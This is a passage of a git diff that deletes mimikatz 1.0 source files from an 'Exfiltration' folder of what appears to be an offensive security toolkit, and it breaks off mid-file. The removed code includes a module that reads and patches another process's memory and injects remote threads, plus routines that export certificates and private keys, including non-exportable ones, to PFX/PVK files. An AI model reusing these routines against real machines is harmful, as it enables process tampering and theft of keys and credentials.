list(vector<wstring> * arguments); - //static bool start(vector<wstring> * arguments); - static bool suspend(vector<wstring> * arguments); - static bool resume(vector<wstring> * arguments); - static bool stop(vector<wstring> * arguments); - //static bool query(vector<wstring> * arguments); - - static bool quit(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.cpp deleted file mode 100644 index 2f541f2..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.cpp +++ /dev/null @@ -1,162 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_winmine.h" -#include "..\global.h" - -char DISP_WINMINE[] = " 123456789*x*?F."; - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_winmine::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(infos, L"infos", L"Obtient des informations sur le dmineur en cours")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(pause, L"pause", L"Met en pause le chronomtre du dmineur en cours")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(reprise, L"reprise", L"Reprend le chronomtre du dmineur en cours")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(start, L"start", L"Dmarre une nouvelle partie")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(cheat, L"cheat", L"Triche au dmineur")); - return monVector; -} - -bool mod_mimikatz_winmine::infos(vector<wstring> * arguments) -{ - return infosOrCheat(arguments, false); -} - -bool mod_mimikatz_winmine::cheat(vector<wstring> * arguments) -{ - return infosOrCheat(arguments, true); -} - -bool mod_mimikatz_winmine::infosOrCheat(vector<wstring> * arguments, bool cheat) -{ - structHandleAndAddr * maStruct = new structHandleAndAddr(); - if(giveHandleAndAddr(maStruct)) - { - structMonDemineur monDemineur; - if(mod_memory::readMemory(maStruct->addrMonDemineur, &monDemineur, sizeof(structMonDemineur), maStruct->hWinmine)) - { - (*outputStream) << L"Mines : " << monDemineur.nbMines << endl << - L"Dimension : " << monDemineur.hauteur << L" lignes x " << monDemineur.longueur << L" colonnes" << endl << - L"Champ : " << endl << endl; - - for (DWORD y = 1; y <= monDemineur.hauteur; y++) - { - if(!cheat) - (*outputStream) << L'\t'; - - for(DWORD x = 1; x <= monDemineur.longueur; x++) - { - BYTE laCase = monDemineur.tabMines[y][x]; - - if(!cheat) - (*outputStream) << L' ' << static_cast<wchar_t>((laCase & 0x80) ? '*' : DISP_WINMINE[laCase & 0x0f]); - else if(laCase & 0x80) - monDemineur.tabMines[y][x] = 0x4e; - } - if(!cheat) - (*outputStream) << endl; - } - - if(cheat) - { - if(mod_memory::writeMemory(maStruct->addrMonDemineur, &monDemineur, sizeof(structMonDemineur), maStruct->hWinmine)) - (*outputStream) << L"Patch ;)" << endl; - - vector<mod_windows::KIWI_HWND_ENTRY> mesHWNDS; - if(mod_windows::getHWNDsFromProcessId(&mesHWNDS, maStruct->pidWinmine)) - { - for(vector<mod_windows::KIWI_HWND_ENTRY>::iterator monHWND = mesHWNDS.begin(); monHWND != mesHWNDS.end(); monHWND++) - { - InvalidateRect(monHWND->monHandle, NULL, TRUE); - UpdateWindow(monHWND->monHandle); - } - } - } - } - CloseHandle(maStruct->hWinmine); - } - delete maStruct; - return true; -} - - -bool mod_mimikatz_winmine::pause(vector<wstring> * arguments) -{ - startThreadAt(FIELD_OFFSET(structHandleAndAddr, addrPause)); - return true; -} - -bool mod_mimikatz_winmine::reprise(vector<wstring> * arguments) -{ - startThreadAt(FIELD_OFFSET(structHandleAndAddr, addrResume)); - return true; -} - -bool mod_mimikatz_winmine::start(vector<wstring> * arguments) -{ - startThreadAt(FIELD_OFFSET(structHandleAndAddr, addrStart)); - return true; -} - -bool mod_mimikatz_winmine::startThreadAt(unsigned long structOffset) -{ - bool reussite = false; - structHandleAndAddr * maStruct = new structHandleAndAddr(); - if(giveHandleAndAddr(maStruct)) - { - if (HANDLE hRemoteThread = CreateRemoteThread(maStruct->hWinmine, NULL, 0, *reinterpret_cast<PTHREAD_START_ROUTINE *>(reinterpret_cast<PBYTE>(maStruct) + structOffset), NULL, 0, NULL)) - { - reussite = true; - WaitForSingleObject(hRemoteThread, INFINITE); - CloseHandle(hRemoteThread); - } - } - delete maStruct; - return reussite; -} - -bool mod_mimikatz_winmine::giveHandleAndAddr(structHandleAndAddr * monHandleAndAddr) -{ - BYTE patternStartGame[] = {0x6a, 0x04, 0xeb, 0x02, 0x6a, 0x06, 0x5b, 0xa3}; - BYTE patternPause[] = {0x02, 0x75, 0x0a, 0xa1}; - BYTE patternReprise[] = {0x01, 0x74, 0x0a, 0xa1}; - BYTE patternStart[] = {0x53, 0x56, 0x57, 0x33, 0xff, 0x3b, 0x05}; - - RtlZeroMemory(monHandleAndAddr, sizeof(structHandleAndAddr)); - - wstring nomDemineur(L"winmine.exe"); - mod_process::KIWI_PROCESSENTRY32 monDemineur; - if(mod_process::getUniqueForName(&monDemineur, &nomDemineur)) - { - monHandleAndAddr->pidWinmine = monDemineur.th32ProcessID; - mod_process::KIWI_MODULEENTRY32 monModule; - if(mod_process::getUniqueModuleForName(&monModule, NULL, &monDemineur.th32ProcessID)) - { - PBYTE limit = monModule.modBaseAddr + monModule.modBaseSize, ptrTemp = NULL; - if(monHandleAndAddr->hWinmine = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, monDemineur.th32ProcessID)) - { - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, patternStartGame, &ptrTemp, sizeof(patternStartGame), true, monHandleAndAddr->hWinmine)) - if(mod_memory::readMemory(ptrTemp + sizeof(patternStartGame), &ptrTemp, sizeof(ULONG), monHandleAndAddr->hWinmine)) // high bits of ptrTemp are already at 00000000 - monHandleAndAddr->addrMonDemineur = reinterpret_cast<structMonDemineur *>(ptrTemp - sizeof(ULONG)); - - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, patternPause, &ptrTemp, sizeof(patternPause), true, monHandleAndAddr->hWinmine)) - monHandleAndAddr->addrPause = reinterpret_cast<PTHREAD_START_ROUTINE>(ptrTemp - 11); - - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, patternReprise, &ptrTemp, sizeof(patternReprise), true, monHandleAndAddr->hWinmine)) - monHandleAndAddr->addrResume = reinterpret_cast<PTHREAD_START_ROUTINE>(ptrTemp - 6); - - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, patternStart, &ptrTemp, sizeof(patternStart), true, monHandleAndAddr->hWinmine)) - monHandleAndAddr->addrStart = reinterpret_cast<PTHREAD_START_ROUTINE>(ptrTemp - 11); - } - } - } - - bool reussite = monHandleAndAddr->hWinmine && monHandleAndAddr->addrMonDemineur && monHandleAndAddr->addrStart && monHandleAndAddr->addrPause && monHandleAndAddr->addrResume; - - if(!reussite && monHandleAndAddr->hWinmine) - CloseHandle(monHandleAndAddr->hWinmine); - - return reussite; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.h deleted file mode 100644 index 3870228..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.h +++ /dev/null @@ -1,45 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_process.h" -#include "mod_memory.h" -#include "mod_windows.h" -#include <iostream> - -class mod_mimikatz_winmine -{ -private: - typedef struct structMonDemineur{ - DWORD32 nbMines; - DWORD32 longueur; - DWORD32 hauteur; - DWORD32 alignOffset; - BYTE tabMines[26][32]; - } structMonDemineur; - - typedef struct structHandleAndAddr{ - HANDLE hWinmine; - DWORD pidWinmine; - structMonDemineur * addrMonDemineur; - PTHREAD_START_ROUTINE addrPause; - PTHREAD_START_ROUTINE addrResume; - PTHREAD_START_ROUTINE addrStart; - } structHandleAndAddr; - - static bool giveHandleAndAddr(structHandleAndAddr * monHandleAndAddr); - static bool startThreadAt(unsigned long structOffset); - static bool infosOrCheat(vector<wstring> * arguments, bool cheat = false); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool infos(vector<wstring> * arguments); - static bool start(vector<wstring> * arguments); - static bool pause(vector<wstring> * arguments); - static bool reprise(vector<wstring> * arguments); - static bool cheat(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_crypto.cpp b/Exfiltration/mimikatz-1.0/modules/mod_crypto.cpp deleted file mode 100644 index 8baffa6..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_crypto.cpp +++ /dev/null @@ -1,240 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_crypto.h" - -bool mod_crypto::getSystemStoreFromString(wstring strSystemStore, DWORD * systemStore) -{ - map<wstring, DWORD> mesEmplacements; - mesEmplacements.insert(make_pair(L"CERT_SYSTEM_STORE_CURRENT_USER", CERT_SYSTEM_STORE_CURRENT_USER)); - mesEmplacements.insert(make_pair(L"CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY", CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY)); - mesEmplacements.insert(make_pair(L"CERT_SYSTEM_STORE_LOCAL_MACHINE", CERT_SYSTEM_STORE_LOCAL_MACHINE)); - mesEmplacements.insert(make_pair(L"CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY", CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY)); - mesEmplacements.insert(make_pair(L"CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE", CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE)); - mesEmplacements.insert(make_pair(L"CERT_SYSTEM_STORE_CURRENT_SERVICE", CERT_SYSTEM_STORE_CURRENT_SERVICE)); - mesEmplacements.insert(make_pair(L"CERT_SYSTEM_STORE_USERS", CERT_SYSTEM_STORE_USERS)); - mesEmplacements.insert(make_pair(L"CERT_SYSTEM_STORE_SERVICES", CERT_SYSTEM_STORE_SERVICES)); - - map<wstring, DWORD>::iterator monIterateur = mesEmplacements.find(strSystemStore); - if(monIterateur != mesEmplacements.end()) - { - *systemStore = monIterateur->second; - return true; - } - else return false; -} - -BOOL WINAPI mod_crypto::enumSysCallback(const void *pvSystemStore, DWORD dwFlags, PCERT_SYSTEM_STORE_INFO pStoreInfo, void *pvReserved, void *pvArg) -{ - reinterpret_cast<vector<wstring> *>(pvArg)->push_back(reinterpret_cast<const wchar_t *>(pvSystemStore)); - return TRUE; -} - -bool mod_crypto::getVectorSystemStores(vector<wstring> * maSystemStoresvector, DWORD systemStore) -{ - return (CertEnumSystemStore(systemStore, NULL, maSystemStoresvector, enumSysCallback) != 0); -} - -bool mod_crypto::getCertNameFromCertCTX(PCCERT_CONTEXT certCTX, wstring * certName) -{ - bool reussite = false; - wchar_t * monBuffer = NULL; - - DWORD maRecherche[] = {CERT_NAME_FRIENDLY_DISPLAY_TYPE, CERT_NAME_DNS_TYPE, CERT_NAME_EMAIL_TYPE, CERT_NAME_UPN_TYPE, CERT_NAME_URL_TYPE}; - - for(DWORD i = 0; !reussite && (i < (sizeof(maRecherche) / sizeof(DWORD))); i++) - { - DWORD tailleRequise = CertGetNameString(certCTX, maRecherche[i], 0, NULL, NULL, 0); - if(tailleRequise > 1) - { - monBuffer = new wchar_t[tailleRequise]; - reussite = CertGetNameString(certCTX, maRecherche[i], 0, NULL, monBuffer, tailleRequise) > 1; - certName->assign(monBuffer); - delete[] monBuffer; - } - } - return reussite; -} - -bool mod_crypto::getKiwiKeyProvInfo(PCCERT_CONTEXT certCTX, KIWI_KEY_PROV_INFO * keyProvInfo) -{ - bool reussite = false; - DWORD taille = 0; - if(CertGetCertificateContextProperty(certCTX, CERT_KEY_PROV_INFO_PROP_ID, NULL, &taille)) - { - BYTE * monBuffer = new BYTE[taille]; - if(reussite = (CertGetCertificateContextProperty(certCTX, CERT_KEY_PROV_INFO_PROP_ID, monBuffer, &taille) != 0)) - { - CRYPT_KEY_PROV_INFO * mesInfos = reinterpret_cast<CRYPT_KEY_PROV_INFO *>(monBuffer); - keyProvInfo->pwszProvName.assign(mesInfos->pwszProvName ? mesInfos->pwszProvName : L"(null)"); - keyProvInfo->pwszContainerName.assign(mesInfos->pwszContainerName ? mesInfos->pwszContainerName : L"(null)"); - keyProvInfo->cProvParam = mesInfos->cProvParam; - keyProvInfo->dwFlags = mesInfos->dwFlags; - keyProvInfo->dwKeySpec = mesInfos->dwKeySpec; - keyProvInfo->dwProvType = mesInfos->dwProvType; - } - delete[] monBuffer; - } - return reussite; -} - -bool mod_crypto::CertCTXtoPFX(PCCERT_CONTEXT certCTX, wstring pfxFile, wstring password) -{ - bool retour = false; - - HCERTSTORE hTempStore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, NULL, CERT_STORE_CREATE_NEW_FLAG, NULL); - PCCERT_CONTEXT pCertContextCopy = NULL; - - if(CertAddCertificateContextToStore(hTempStore, certCTX, CERT_STORE_ADD_NEW, &pCertContextCopy)) - { - CRYPT_DATA_BLOB bDataBlob = {0, NULL}; - if(PFXExportCertStoreEx(hTempStore, &bDataBlob, password.c_str(), NULL, EXPORT_PRIVATE_KEYS | REPORT_NOT_ABLE_TO_EXPORT_PRIVATE_KEY)) - { - bDataBlob.pbData = new BYTE[bDataBlob.cbData]; - if(PFXExportCertStoreEx(hTempStore, &bDataBlob, password.c_str(), NULL, EXPORT_PRIVATE_KEYS | REPORT_NOT_ABLE_TO_EXPORT_PRIVATE_KEY)) - { - HANDLE hFile = CreateFile(pfxFile.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); - if(hFile && hFile != INVALID_HANDLE_VALUE) - { - DWORD dwBytesWritten; - if(WriteFile(hFile, bDataBlob.pbData, bDataBlob.cbData, &dwBytesWritten, NULL) && (bDataBlob.cbData == dwBytesWritten)) - { - retour = FlushFileBuffers(hFile) != 0; - } - CloseHandle(hFile); - } - } - delete[] bDataBlob.pbData; - } - CertFreeCertificateContext(pCertContextCopy); - } - CertCloseStore(hTempStore, CERT_CLOSE_STORE_FORCE_FLAG); - - return retour; -} - -bool mod_crypto::CertCTXtoDER(PCCERT_CONTEXT certCTX, wstring DERFile) -{ - bool retour = false; - - HANDLE hFile = CreateFile(DERFile.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); - if(hFile && hFile != INVALID_HANDLE_VALUE) - { - DWORD dwBytesWritten; - if(WriteFile(hFile, certCTX->pbCertEncoded, certCTX->cbCertEncoded, &dwBytesWritten, NULL) && certCTX->cbCertEncoded == dwBytesWritten) - { - retour = FlushFileBuffers(hFile) != 0; - } - CloseHandle(hFile); - } - return retour; -} - -wstring mod_crypto::KeyTypeToString(DWORD keyType) -{ - wostringstream keyTypeStr; - switch (keyType) - { - case AT_KEYEXCHANGE: - keyTypeStr << L"AT_KEYEXCHANGE"; - break; - case AT_SIGNATURE: - keyTypeStr << L"AT_SIGNATURE"; - break; - default: - keyTypeStr << L"? (" << hex << keyType << L")"; - } - return keyTypeStr.str(); -} - - -bool mod_crypto::PrivateKeyBlobToPVK(BYTE * monExport, DWORD tailleExport, wstring pvkFile, DWORD keySpec) -{ - bool retour = false; - FILE_HDR monHeader = {PVK_MAGIC, PVK_FILE_VERSION_0, keySpec, PVK_NO_ENCRYPT, 0, tailleExport}; - - HANDLE hFile = CreateFile(pvkFile.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); - if(hFile && hFile != INVALID_HANDLE_VALUE) - { - DWORD dwBytesWritten; - if(WriteFile(hFile, &monHeader, sizeof(monHeader), &dwBytesWritten, NULL) && (sizeof(monHeader) == dwBytesWritten)) - { - if(WriteFile(hFile, monExport, tailleExport, &dwBytesWritten, NULL) && (tailleExport == dwBytesWritten)) - { - retour = FlushFileBuffers(hFile) != 0; - } - } - CloseHandle(hFile); - } - - return retour; -} - -bool mod_crypto::genericDecrypt(BYTE * data, SIZE_T dataSize, const BYTE * key, SIZE_T keySize, ALG_ID algorithme, BYTE * destBuffer, SIZE_T destBufferSize) -{ - bool retour = false; - HCRYPTPROV hCryptProv = NULL; - HCRYPTKEY hKey = NULL; - PBYTE buffer = data; - DWORD dwWorkingBufferLength = dataSize; - - if(destBuffer && destBufferSize >= dataSize) - { - RtlCopyMemory(destBuffer, data, dataSize); - buffer = destBuffer; - } - - if((algorithme == CALG_RC4) && (keySize > 16)) - { - fullRC4(buffer, dataSize, key, keySize); - retour = true; - } - else - { - if(CryptAcquireContext(&hCryptProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) - { - GENERICKEY_BLOB myKeyHead = {{PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, algorithme}, keySize}; - BYTE * myKey = new BYTE[sizeof(GENERICKEY_BLOB) + keySize]; - RtlCopyMemory(myKey, &myKeyHead, sizeof(GENERICKEY_BLOB)); - RtlCopyMemory(myKey + sizeof(GENERICKEY_BLOB), key, keySize); - - if(CryptImportKey(hCryptProv, myKey, sizeof(GENERICKEY_BLOB) + keySize, 0, CRYPT_EXPORTABLE, &hKey)) - { - if(CryptDecrypt(hKey, NULL, TRUE, 0, buffer, &dwWorkingBufferLength) || ((algorithme == CALG_DES) && (GetLastError() == NTE_BAD_DATA))) // vite les erreurs de parits http://support.microsoft.com/kb/331367/ - retour = (dwWorkingBufferLength == dataSize); - CryptDestroyKey(hKey); - } - delete[] myKey; - CryptReleaseContext(hCryptProv, 0); - } - } - return retour; -} - -void mod_crypto::fullRC4(BYTE * data, SIZE_T data_len, const BYTE * key, SIZE_T keylen) // pour les cls >= 128 bits (16 octets) -{ - ULONG i, j, k = 0, kpos = 0; - BYTE S[256], *pos = data; - - for (i = 0; i < 256; i++) - S[i] = static_cast<BYTE>(i); - - for (i = 0, j = 0; i < 256; i++) - { - j = (j + S[i] + key[kpos]) & 0xff; - kpos++; - if (kpos >= keylen) - kpos = 0; - S_SWAP(i, j); - } - - for (i = 0, j = 0; k < data_len; k++) - { - i = (i + 1) & 0xff; - j = (j + S[i]) & 0xff; - S_SWAP(i, j); - *pos++ ^= S[(S[i] + S[j]) & 0xff]; - } -} diff --git a/Exfiltration/mimikatz-1.0/modules/mod_crypto.h b/Exfiltration/mimikatz-1.0/modules/mod_crypto.h deleted file mode 100644 index 582ed36..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_crypto.h +++ /dev/null @@ -1,60 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <wincrypt.h> -#include <sstream> -#include <map> - -#define PVK_FILE_VERSION_0 0 -#define PVK_MAGIC 0xb0b5f11e // bob's file -#define PVK_NO_ENCRYPT 0 -#define PVK_RC4_PASSWORD_ENCRYPT 1 -#define PVK_RC2_CBC_PASSWORD_ENCRYPT 2 - -class mod_crypto -{ -public: - typedef struct _KIWI_KEY_PROV_INFO { - std::wstring pwszContainerName; - std::wstring pwszProvName; - DWORD dwProvType; - DWORD dwFlags; - DWORD cProvParam; - DWORD dwKeySpec; - } KIWI_KEY_PROV_INFO, *PKIWI_KEY_PROV_INFO; - -private: - typedef struct _GENERICKEY_BLOB { - BLOBHEADER BlobHeader; - DWORD dwKeyLen; - } GENERICKEY_BLOB, *PGENERICKEY_BLOB; - - typedef struct _FILE_HDR { - DWORD dwMagic; - DWORD dwVersion; - DWORD dwKeySpec; - DWORD dwEncryptType; - DWORD cbEncryptData; - DWORD cbPvk; - } FILE_HDR, *PFILE_HDR; - - static BOOL WINAPI enumSysCallback(const void *pvSystemStore, DWORD dwFlags, PCERT_SYSTEM_STORE_INFO pStoreInfo, void *pvReserved, void *pvArg); -public: - static bool getSystemStoreFromString(wstring strSystemStore, DWORD * systemStore); - - static bool getVectorSystemStores(vector<wstring> * maSystemStoresvector, DWORD systemStore = CERT_SYSTEM_STORE_CURRENT_USER); - static bool getCertNameFromCertCTX(PCCERT_CONTEXT certCTX, wstring * certName); - static bool getKiwiKeyProvInfo(PCCERT_CONTEXT certCTX, KIWI_KEY_PROV_INFO * keyProvInfo); - - static bool PrivateKeyBlobToPVK(BYTE * monExport, DWORD tailleExport, wstring pvkFile, DWORD keySpec = AT_KEYEXCHANGE); - static bool CertCTXtoPFX(PCCERT_CONTEXT certCTX, wstring pfxFile, wstring password); - static bool CertCTXtoDER(PCCERT_CONTEXT certCTX, wstring DERFile); - static wstring KeyTypeToString(DWORD keyType); - - static bool genericDecrypt(BYTE * data, SIZE_T data_len, const BYTE * key, SIZE_T keylen, ALG_ID algorithme, BYTE * destBuffer = NULL, SIZE_T destBufferSize = 0); - static void fullRC4(BYTE * data, SIZE_T data_len, const BYTE * key, SIZE_T keylen); // keysize >= 128 bits (16 bytes) -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp b/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp deleted file mode 100644 index f886f09..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.cpp +++ /dev/null @@ -1,138 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_cryptoapi.h" -HMODULE mod_cryptoapi::hRsaEng = NULL; - -bool mod_cryptoapi::loadRsaEnh() -{ - if(!hRsaEng) - hRsaEng = LoadLibrary(L"rsaenh"); - return (hRsaEng != NULL); -} - -bool mod_cryptoapi::unloadRsaEnh() -{ - if(hRsaEng) - FreeLibrary(hRsaEng); - return true; -} - -bool mod_cryptoapi::getProviderString(wstring ProviderName, wstring * Provider) -{ - map<wstring, wstring> mesProviders; - mesProviders.insert(make_pair(L"MS_DEF_PROV", MS_DEF_PROV)); - mesProviders.insert(make_pair(L"MS_ENHANCED_PROV", MS_ENHANCED_PROV)); - mesProviders.insert(make_pair(L"MS_STRONG_PROV", MS_STRONG_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_RSA_SIG_PROV", MS_DEF_RSA_SIG_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_RSA_SCHANNEL_PROV", MS_DEF_RSA_SCHANNEL_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_DSS_PROV", MS_DEF_DSS_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_DSS_DH_PROV", MS_DEF_DSS_DH_PROV)); - mesProviders.insert(make_pair(L"MS_ENH_DSS_DH_PROV", MS_ENH_DSS_DH_PROV)); - mesProviders.insert(make_pair(L"MS_DEF_DH_SCHANNEL_PROV", MS_DEF_DH_SCHANNEL_PROV)); - mesProviders.insert(make_pair(L"MS_SCARD_PROV", MS_SCARD_PROV)); - mesProviders.insert(make_pair(L"MS_ENH_RSA_AES_PROV", MS_ENH_RSA_AES_PROV)); - mesProviders.insert(make_pair(L"MS_ENH_RSA_AES_PROV_XP", MS_ENH_RSA_AES_PROV_XP)); - - map<wstring, wstring>::iterator monIterateur = mesProviders.find(ProviderName); - *Provider = (monIterateur != mesProviders.end()) ? monIterateur->second : ProviderName; - return true; -} - -bool mod_cryptoapi::getProviderTypeFromString(wstring ProviderTypeName, DWORD * ProviderType) -{ - map<wstring, DWORD> mesTypes; - mesTypes.insert(make_pair(L"PROV_RSA_FULL", PROV_RSA_FULL)); - mesTypes.insert(make_pair(L"PROV_RSA_SIG", PROV_RSA_SIG)); - mesTypes.insert(make_pair(L"PROV_DSS", PROV_DSS)); - mesTypes.insert(make_pair(L"PROV_FORTEZZA", PROV_FORTEZZA)); - mesTypes.insert(make_pair(L"PROV_MS_EXCHANGE", PROV_MS_EXCHANGE)); - mesTypes.insert(make_pair(L"PROV_SSL", PROV_SSL)); - mesTypes.insert(make_pair(L"PROV_RSA_SCHANNEL", PROV_RSA_SCHANNEL)); - mesTypes.insert(make_pair(L"PROV_DSS_DH", PROV_DSS_DH)); - mesTypes.insert(make_pair(L"PROV_EC_ECDSA_SIG", PROV_EC_ECDSA_SIG)); - mesTypes.insert(make_pair(L"PROV_EC_ECNRA_SIG", PROV_EC_ECNRA_SIG)); - mesTypes.insert(make_pair(L"PROV_EC_ECDSA_FULL",PROV_EC_ECDSA_FULL)); - mesTypes.insert(make_pair(L"PROV_EC_ECNRA_FULL",PROV_EC_ECNRA_FULL)); - mesTypes.insert(make_pair(L"PROV_DH_SCHANNEL", PROV_DH_SCHANNEL)); - mesTypes.insert(make_pair(L"PROV_SPYRUS_LYNKS", PROV_SPYRUS_LYNKS)); - mesTypes.insert(make_pair(L"PROV_RNG", PROV_RNG)); - mesTypes.insert(make_pair(L"PROV_INTEL_SEC", PROV_INTEL_SEC)); - mesTypes.insert(make_pair(L"PROV_REPLACE_OWF", PROV_REPLACE_OWF)); - mesTypes.insert(make_pair(L"PROV_RSA_AES", PROV_RSA_AES)); - - map<wstring, DWORD>::iterator monIterateur = mesTypes.find(ProviderTypeName); - if(monIterateur != mesTypes.end()) - { - *ProviderType = monIterateur->second; - return true; - } - else return false; -} - -bool mod_cryptoapi::getVectorProviders(vector<wstring> * monVectorProviders) -{ - DWORD index = 0; - DWORD provType; - DWORD tailleRequise; - - while(CryptEnumProviders(index, NULL, 0, &provType, NULL, &tailleRequise)) - { - wchar_t * monProvider = new wchar_t[tailleRequise]; - if(CryptEnumProviders(index, NULL, 0, &provType, monProvider, &tailleRequise)) - { - monVectorProviders->push_back(monProvider); - } - delete[] monProvider; - index++; - } - return (GetLastError() == ERROR_NO_MORE_ITEMS); -} - -bool mod_cryptoapi::getVectorContainers(vector<wstring> * monVectorContainers, bool isMachine, wstring provider, DWORD providerType) -{ - bool reussite = false; - - HCRYPTPROV hCryptProv = NULL; - if(CryptAcquireContext(&hCryptProv, NULL, provider.c_str(), providerType, CRYPT_VERIFYCONTEXT | (isMachine ? CRYPT_MACHINE_KEYSET : NULL))) - { - DWORD tailleRequise = 0; - char * containerName = NULL; - DWORD CRYPT_first_next = CRYPT_FIRST; - bool success = false; - - success = (CryptGetProvParam(hCryptProv, PP_ENUMCONTAINERS, NULL, &tailleRequise, CRYPT_first_next) != 0); - while(success) - { - containerName = new char[tailleRequise]; - if(success = (CryptGetProvParam(hCryptProv, PP_ENUMCONTAINERS, reinterpret_cast<BYTE *>(containerName), &tailleRequise, CRYPT_first_next) != 0)) - { - wstringstream resultat; - resultat << containerName; - monVectorContainers->push_back(resultat.str()); - } - delete[] containerName; - CRYPT_first_next = CRYPT_NEXT; - } - reussite = (GetLastError() == ERROR_NO_MORE_ITEMS); - CryptReleaseContext(hCryptProv, 0); - } - - return reussite; -} - -bool mod_cryptoapi::getPrivateKey(HCRYPTKEY maCle, PBYTE * monExport, DWORD * tailleExport, DWORD dwBlobType) -{ - bool reussite = false; - - if(CryptExportKey(maCle, NULL, dwBlobType, NULL, NULL, tailleExport)) - { - *monExport = new BYTE[*tailleExport]; - if(!(reussite = (CryptExportKey(maCle, NULL, dwBlobType, NULL, *monExport, tailleExport) != 0))) - delete[] monExport; - - } - return reussite; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.h b/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.h deleted file mode 100644 index 8c70b48..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_cryptoapi.h +++ /dev/null @@ -1,26 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <wincrypt.h> -#include <sstream> -#include <map> - -class mod_cryptoapi /* Ref : http://msdn.microsoft.com/en-us/library/aa380255.aspx */ -{ -private: - static HMODULE hRsaEng; -public: - static bool getProviderString(wstring ProviderName, wstring * Provider); - static bool getProviderTypeFromString(wstring ProviderTypeName, DWORD * ProviderType); - - static bool getVectorProviders(vector<wstring> * monVectorProviders); - static bool getVectorContainers(vector<wstring> * monVectorContainers, bool isMachine = false, wstring provider = MS_ENHANCED_PROV, DWORD providerType = PROV_RSA_FULL); - static bool getPrivateKey(HCRYPTKEY maCle, PBYTE * monExport, DWORD * tailleExport, DWORD dwBlobType = PRIVATEKEYBLOB); - - static bool loadRsaEnh(); - static bool unloadRsaEnh(); -}; diff --git a/Exfiltration/mimikatz-1.0/modules/mod_cryptong.cpp b/Exfiltration/mimikatz-1.0/modules/mod_cryptong.cpp deleted file mode 100644 index 690f390..0000000 --- a/Exfiltration/mimikatz-1.0/modules/mod_cryptong.cpp +++ /dev/null @@ -1,143 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_cryptong.h" - -HMODULE hNcrypt = 